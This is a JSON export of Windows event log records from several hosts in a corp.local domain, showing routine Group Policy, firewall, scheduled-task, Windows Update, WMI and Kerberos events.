{"EventTime":"2021-10-02T17:23:43.892646+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223372036854775808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":1129,"SourceName":"Microsoft-Windows-GroupPolicy","ProviderGuid":"{AEA1B4FA-97D1-45F2-A64C-4D69FFFD92C9}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56667,"ActivityID":"{042766DA-7079-4ED7-A643-06E16A42D4AC}","ExecutionProcessID":540,"ExecutionThreadID":5472,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has successfully processed. If you do not see a success message for several hours, then contact your administrator.","Opcode":"Info","SupportInfo1":"1","SupportInfo2":"2049","ProcessingMode":"0","ProcessingTimeInMilliseconds":"235","ErrorCode":"1222","ErrorDescription":"The network is not present or not started. ","EventReceivedTime":"2021-10-02T17:23:45.474251+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T11:35:42.313991+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4660,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12801,"OpcodeValue":0,"RecordNumber":18995189,"ExecutionProcessID":4,"ExecutionThreadID":7072,"Channel":"Security","Message":"An object was deleted.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\tSecurity\r\n\tHandle ID:\t0x1d4\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x1f2c\r\n\tProcess Name:\tC:\\Windows\\System32\\wevtutil.exe\r\n\tTransaction ID:\t{00000000-0000-0000-0000-000000000000}","Category":"Registry","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectServer":"Security","HandleId":"0x1d4","ProcessId":"0x1f2c","ProcessName":"C:\\Windows\\System32\\wevtutil.exe","TransactionId":"{00000000-0000-0000-0000-000000000000}","EventReceivedTime":"2021-10-02T11:35:46.494159+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:13:30.250988+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4663,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12812,"OpcodeValue":0,"RecordNumber":896525,"ExecutionProcessID":4,"ExecutionThreadID":5876,"Channel":"Security","Message":"An attempt was made to access an object.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tACC01$\r\n\tAccount Domain:\t\tPROD\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\t\tSecurity\r\n\tObject Type:\t\tFile\r\n\tObject Name:\t\t\\Device\\HarddiskVolume3\r\n\tHandle ID:\t\t0x17dc\r\n\tResource Attributes:\tS:\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x9b4\r\n\tProcess Name:\t\tC:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2011.6-0\\MsMpEng.exe\r\n\r\nAccess Request Information:\r\n\tAccesses:\t\tReadData (or ListDirectory)\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x1","Category":"Removable Storage","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"ACC01$","SubjectDomainName":"PROD","SubjectLogonId":"0x3e7","ObjectServer":"Security","ObjectType":"File","ObjectName":"\\Device\\HarddiskVolume3","HandleId":"0x17dc","AccessList":"%%4416\n\t\t\t\t","AccessMask":"0x1","ProcessId":"0x9b4","ProcessName":"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2011.6-0\\MsMpEng.exe","ResourceAttributes":"S:","EventReceivedTime":"2021-10-02T17:13:32.094570+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T11:35:45.873034+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4657,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12801,"OpcodeValue":0,"RecordNumber":18995193,"ExecutionProcessID":4,"ExecutionThreadID":3148,"Channel":"Security","Message":"A registry value was modified.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Name:\t\t\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\WMI\\Autologger\\EventLog-System\\{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}\r\n\tObject Value Name:\tMatchAnyKeyword\r\n\tHandle ID:\t\t0x1fc\r\n\tOperation Type:\t\tExisting registry value modified\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x1868\r\n\tProcess Name:\t\tC:\\Windows\\System32\\wevtutil.exe\r\n\r\nChange Information:\r\n\tOld Value Type:\t\tREG_QWORD\r\n\tOld Value:\t\t0x8000000000000000\r\n\tNew Value Type:\t\tREG_QWORD\r\n\tNew Value:\t\t0xC000000000000000","Category":"Registry","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectName":"\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\WMI\\Autologger\\EventLog-System\\{11cd958a-c507-4ef3-b3f2-5fd9dfbd2c78}","ObjectValueName":"MatchAnyKeyword","HandleId":"0x1fc","OperationType":"%%1905","OldValueType":"%%1883","OldValue":"0x8000000000000000","NewValueType":"%%1883","NewValue":"0xC000000000000000","ProcessId":"0x1868","ProcessName":"C:\\Windows\\System32\\wevtutil.exe","EventReceivedTime":"2021-10-02T11:35:47.536882+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:12:48.932759+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4946,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":896513,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":1524,"Channel":"Security","Message":"A change was made to the Windows Firewall exception list. A rule was added.\r\n\t\r\nProfile Changed:\tAll\r\n\r\nAdded Rule:\r\n\tRule ID:\t{A46D3672-7F06-4D39-8A6D-F1AC1DF3A2D1}\r\n\tRule Name:\tWinDefend Outbound for TCP","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","ProfileChanged":"All","RuleId":"{A46D3672-7F06-4D39-8A6D-F1AC1DF3A2D1}","RuleName":"WinDefend Outbound for TCP","EventReceivedTime":"2021-10-02T17:12:49.778527+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:12:48.916911+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223374235878031360","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2004,"SourceName":"Microsoft-Windows-Windows Firewall With Advanced Security","ProviderGuid":"{D1BC9AFF-2ABF-4D71-9146-ECB2A986EB85}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4831,"ExecutionProcessID":1732,"ExecutionThreadID":3968,"Channel":"Microsoft-Windows-Windows Firewall With Advanced Security/Firewall","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"A rule has been added to the Windows Defender Firewall exception list.\r\n\r\nAdded Rule:\r\n\tRule ID:\td60efa47-03cd-4c43-8d19-c4caae270a32\r\n\tRule Name:\tInbound service restriction rule for WinDefend\r\n\tOrigin:\tLocal\r\n\tActive:\tYes\r\n\tDirection:\tInbound\r\n\tProfiles:\tPrivate,Domain, Public\r\n\tAction:\tBlock\r\n\tApplication Path:\tC:\\ProgramData\\Microsoft\\Windows Defender\\platform\\4.18.2011.6-0\\MsMpEng.exe\r\n\tService Name:\tWinDefend\r\n\tProtocol:\tAny\r\n\tSecurity Options:\tNone\r\n\tEdge Traversal:\tNone\r\n\tModifying User:\tS-1-5-18\r\n\tModifying Application:\tC:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2011.6-0\\MsMpEng.exe","Opcode":"Info","RuleId":"d60efa47-03cd-4c43-8d19-c4caae270a32","RuleName":"Inbound service restriction rule for WinDefend","Origin":"1","ApplicationPath":"C:\\ProgramData\\Microsoft\\Windows Defender\\platform\\4.18.2011.6-0\\MsMpEng.exe","ServiceName":"WinDefend","Direction":"1","Protocol":"256","Action":"2","Profiles":"2147483647","LocalAddresses":"*","RemoteAddresses":"*","Flags":"1","Active":"1","EdgeTraversal":"0","LooseSourceMapped":"0","SecurityOptions":"0","ModifyingUser":"S-1-5-18","ModifyingApplication":"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2011.6-0\\MsMpEng.exe","SchemaVersion":"542","RuleStatus":"65536","LocalOnlyMapped":"0","EventReceivedTime":"2021-10-02T17:12:49.778527+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:12:48.879652+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9223374235878031360","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2006,"SourceName":"Microsoft-Windows-Windows Firewall With Advanced Security","ProviderGuid":"{D1BC9AFF-2ABF-4D71-9146-ECB2A986EB85}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4829,"ExecutionProcessID":1732,"ExecutionThreadID":6784,"Channel":"Microsoft-Windows-Windows Firewall With Advanced Security/Firewall","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"A rule has been deleted in the Windows Defender Firewall exception list.\r\n\r\nDeleted Rule:\r\n\tRule ID:\ta9451017-7b7b-4b5d-8e01-e7eeca12fdab\r\n\tRule Name:\tInbound service restriction rule for WinDefend\r\n\tModifying User:\tS-1-5-18\r\n\tModifying Application:\tC:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2011.6-0\\MsMpEng.exe","Opcode":"Info","RuleId":"a9451017-7b7b-4b5d-8e01-e7eeca12fdab","RuleName":"Inbound service restriction rule for WinDefend","ModifyingUser":"S-1-5-18","ModifyingApplication":"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2011.6-0\\MsMpEng.exe","EventReceivedTime":"2021-10-02T17:12:49.778527+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:12:48.925751+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4948,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":896512,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":1524,"Channel":"Security","Message":"A change was made to the Windows Firewall exception list. A rule was deleted.\r\n\t\r\nProfile Changed:\tAll\r\n\r\nDeleted Rule:\r\n\tRule ID:\t{AF5FBDA2-BFD4-4140-8E75-FDE40ABCFBA1}\r\n\tRule Name:\tWinDefend Outbound for TCP","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","ProfileChanged":"All","RuleId":"{AF5FBDA2-BFD4-4140-8E75-FDE40ABCFBA1}","RuleName":"WinDefend Outbound for TCP","EventReceivedTime":"2021-10-02T17:12:49.778527+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:12:57.227169+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":5719,"SourceName":"NETLOGON","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56664,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"This computer was not able to set up a secure session with a domain controller in domain PROD due to the following: \r\nWe can't sign you in with this credential because your domain isn't available. Make sure your device is connected to your organization's network and try again. If you previously signed in on this device with another credential, you can sign in with that credential. \r\nThis may lead to authentication problems. Make sure that this computer is connected to the network. If the problem persists, please contact your domain administrator.  \r\n\r\nADDITIONAL INFO \r\nIf this computer is a domain controller for the specified domain, it sets up the secure session to the primary domain controller emulator in the specified domain. Otherwise, this computer sets up the secure session to any domain controller in the specified domain.","Opcode":"Info","Data":"PROD","Data_1":"%%1311","EventData.Binary":"5E0000C0","EventReceivedTime":"2021-10-02T17:12:57.820781+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T08:37:48.529981+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4698,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12804,"OpcodeValue":0,"RecordNumber":4065304,"ActivityID":"{1861A8E2-AEB2-0000-61A9-6118B2AED701}","ExecutionProcessID":640,"ExecutionThreadID":1636,"Channel":"Security","Message":"A scheduled task was created.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nTask Information:\r\n\tTask Name: \t\t\\Microsoft\\Windows\\UpdateOrchestrator\\Universal Orchestrator Start\r\n\tTask Content: \t\t<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\UpdateOrchestrator\\Universal Orchestrator Start</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;BA)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2021-10-02T11:23:00.000Z</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>%systemroot%\\system32\\usoclient.exe</Command>\r\n      <Arguments>StartUWork</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n</Task>\r\n\r\nOther Information:\r\n\tProcessCreationTime: \t\t5066549580791828\r\n\tClientProcessId: \t\t\t356\r\n\tParentProcessId: \t\t\t604\r\n\tFQDN: \t\t0\r\n\t","Category":"Other Object Access Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","TaskName":"\\Microsoft\\Windows\\UpdateOrchestrator\\Universal Orchestrator Start","TaskContent":"<?xml version=\"1.0\" encoding=\"UTF-16\"?>\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\n  <RegistrationInfo>\n    <URI>\\Microsoft\\Windows\\UpdateOrchestrator\\Universal Orchestrator Start</URI>\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FRFX;;;LS)(A;;FRFX;;;BA)</SecurityDescriptor>\n  </RegistrationInfo>\n  <Triggers>\n    <TimeTrigger>\n      <StartBoundary>2021-10-02T11:23:00.000Z</StartBoundary>\n      <Enabled>true</Enabled>\n    </TimeTrigger>\n  </Triggers>\n  <Settings>\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\n    <AllowHardTerminate>true</AllowHardTerminate>\n    <StartWhenAvailable>false</StartWhenAvailable>\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\n    <IdleSettings>\n      <Duration>PT10M</Duration>\n      <WaitTimeout>PT1H</WaitTimeout>\n      <StopOnIdleEnd>true</StopOnIdleEnd>\n      <RestartOnIdle>false</RestartOnIdle>\n    </IdleSettings>\n    <AllowStartOnDemand>true</AllowStartOnDemand>\n    <Enabled>true</Enabled>\n    <Hidden>false</Hidden>\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\n    <WakeToRun>false</WakeToRun>\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\n    <Priority>7</Priority>\n  </Settings>\n  <Actions Context=\"Author\">\n    <Exec>\n      <Command>%systemroot%\\system32\\usoclient.exe</Command>\n      <Arguments>StartUWork</Arguments>\n    </Exec>\n  </Actions>\n  <Principals>\n    <Principal id=\"Author\">\n      <UserId>S-1-5-18</UserId>\n      <RunLevel>LeastPrivilege</RunLevel>\n    </Principal>\n  </Principals>\n</Task>","ClientProcessStartKey":"5066549580791828","ClientProcessId":"356","ParentProcessId":"604","RpcCallClientLocality":"0","FQDN":"IT01.corp.local","EventReceivedTime":"2021-10-02T08:37:50.444983+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T12:25:41.472058+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854784004","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":44,"SourceName":"Microsoft-Windows-WindowsUpdateClient","ProviderGuid":"{945A8954-C147-4ACD-923F-40C45405A658}","Version":1,"TaskValue":1,"OpcodeValue":12,"RecordNumber":26200,"ActivityID":"{1861A8E2-AEB2-0001-C704-6518B2AED701}","ExecutionProcessID":356,"ExecutionThreadID":3472,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Windows Update started downloading an update.","Category":"Windows Update Agent","Opcode":"Download","updateTitle":"Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.349.1764.0)","updateGuid":"{ff308918-dc38-46af-b26b-84c0adffca8d}","updateRevisionNumber":"200","EventReceivedTime":"2021-10-02T12:25:43.418694+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T09:07:17.003217+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4664,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12800,"OpcodeValue":0,"RecordNumber":4066284,"ExecutionProcessID":4,"ExecutionThreadID":5956,"Channel":"Security","Message":"An attempt was made to create a hard link.\r\n\r\nSubject:\r\n\tAccount Name:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLink Information:\r\n\tFile Name:\tC:\\Program Files\\WindowsApps\\Microsoft.Windows.Photos_2021.21070.22007.0_x64__8wekyb3d8bbwe\\Assets\\VideoEditor\\contrast-white\\VideoEditorWideTile.scale-200_contrast-white.png\r\n\tLink Name:\tC:\\Program Files\\WindowsApps\\Microsoft.Windows.Photos_2021.21090.10007.0_neutral_split.scale-100_8wekyb3d8bbwe\\Assets\\VideoEditor\\contrast-white\\VideoEditorSplashScreen.scale-100_contrast-white.png\r\n\tTransaction ID:\t{00000000-0000-0000-0000-000000000000}","Category":"File System","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","FileName":"C:\\Program Files\\WindowsApps\\Microsoft.Windows.Photos_2021.21070.22007.0_x64__8wekyb3d8bbwe\\Assets\\VideoEditor\\contrast-white\\VideoEditorWideTile.scale-200_contrast-white.png","LinkName":"C:\\Program Files\\WindowsApps\\Microsoft.Windows.Photos_2021.21090.10007.0_neutral_split.scale-100_8wekyb3d8bbwe\\Assets\\VideoEditor\\contrast-white\\VideoEditorSplashScreen.scale-100_contrast-white.png","TransactionId":"{00000000-0000-0000-0000-000000000000}","EventReceivedTime":"2021-10-02T09:07:18.629682+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T09:09:00.973984+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16,"SourceName":"Microsoft-Windows-Kernel-General","ProviderGuid":"{A68CA8B7-004F-D7B6-A698-07E2DE0F1F5D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":26195,"ExecutionProcessID":348,"ExecutionThreadID":6384,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The access history in hive \\??\\C:\\ProgramData\\Microsoft\\Windows\\AppRepository\\Packages\\Microsoft.Windows.Photos_2021.21090.10007.0_x64__8wekyb3d8bbwe\\ActivationStore.dat was cleared updating 0 keys and creating 0 modified pages.","Opcode":"Info","HiveNameLength":"142","HiveName":"\\??\\C:\\ProgramData\\Microsoft\\Windows\\AppRepository\\Packages\\Microsoft.Windows.Photos_2021.21090.10007.0_x64__8wekyb3d8bbwe\\ActivationStore.dat","KeysUpdated":"0","DirtyPages":"0","EventReceivedTime":"2021-10-02T09:09:02.921487+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T09:09:03.055334+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4699,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12804,"OpcodeValue":0,"RecordNumber":4066291,"ActivityID":"{1861A8E2-AEB2-0000-61A9-6118B2AED701}","ExecutionProcessID":640,"ExecutionThreadID":6332,"Channel":"Security","Message":"A scheduled task was deleted.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nTask Information:\r\n\tTask Name: \t\t\\Microsoft\\Windows\\UpdateOrchestrator\\Universal Orchestrator Start\r\n\tTask Content: \t\t\r\n\r\nOther Information:\r\n\tProcessCreationTime: \t\t5066549580791828\r\n\tClientProcessId: \t\t\t356\r\n\tParentProcessId: \t\t\t604\r\n\tFQDN: \t\t0\r\n\t","Category":"Other Object Access Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","TaskName":"\\Microsoft\\Windows\\UpdateOrchestrator\\Universal Orchestrator Start","ClientProcessStartKey":"5066549580791828","ClientProcessId":"356","ParentProcessId":"604","RpcCallClientLocality":"0","FQDN":"IT01.corp.local","EventReceivedTime":"2021-10-02T09:09:04.930427+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T14:44:25.708715+05:45","Hostname":"IT03.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":0,"SourceName":"gupdate","TaskValue":0,"RecordNumber":30291,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","ERROR_EVT_UNRESOLVED":true,"Message":"Service stopped","EventData":"<Data>Service stopped</Data>","EventReceivedTime":"2021-10-02T14:44:26.708752+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:58:54.124703+05:45","Hostname":"IT03.corp.local","Keywords":"4611686018427387904","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":5858,"SourceName":"Microsoft-Windows-WMI-Activity","ProviderGuid":"{1418EF04-B0B4-4623-BF7E-D74AB47BBDAA}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":20310,"ActivityID":"{C4CABCCB-A926-0001-EBB8-CCC426A9D701}","ExecutionProcessID":1904,"ExecutionThreadID":2744,"Channel":"Microsoft-Windows-WMI-Activity/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Id = {C4CABCCB-A926-0001-EBB8-CCC426A9D701}; ClientMachine = IT03; User = NT AUTHORITY\\SYSTEM; ClientProcessId = 3408; Component = Unknown; Operation = Start IWbemServices::ExecNotificationQuery - ROOT\\CIMV2 : SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'wsmprovhost.exe'; ResultCode = 0x80041032; PossibleCause = Unknown","Opcode":"Info","UserData":"<Operation_ClientFailure xmlns='http://manifests.microsoft.com/win/2006/windows/WMI'><Id>{C4CABCCB-A926-0001-EBB8-CCC426A9D701}</Id><ClientMachine>IT03</ClientMachine><User>NT AUTHORITY\\SYSTEM</User><ClientProcessId>3408</ClientProcessId><Component>Unknown</Component><Operation>Start IWbemServices::ExecNotificationQuery - ROOT\\CIMV2 : SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'wsmprovhost.exe'</Operation><ResultCode>0x80041032</ResultCode><PossibleCause>Unknown</PossibleCause></Operation_ClientFailure>","EventReceivedTime":"2021-10-02T18:58:55.737674+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:56:17.262480+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":14339,"OpcodeValue":0,"RecordNumber":190902186,"ExecutionProcessID":512,"ExecutionThreadID":4140,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tIT03$\r\n\tSupplied Realm Name:\tcorp.local\r\n\tUser ID:\t\t\tS-1-5-21-2569713578-3403938347-3732993993-1140\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::ffff:192.168.2.108\r\n\tClient Port:\t\t10586\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"IT03$","TargetDomainName":"corp.local","TargetSid":"S-1-5-21-2569713578-3403938347-3732993993-1140","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2569713578-3403938347-3732993993-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::ffff:192.168.2.108","IpPort":"10586","EventReceivedTime":"2021-10-02T18:56:19.012510+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
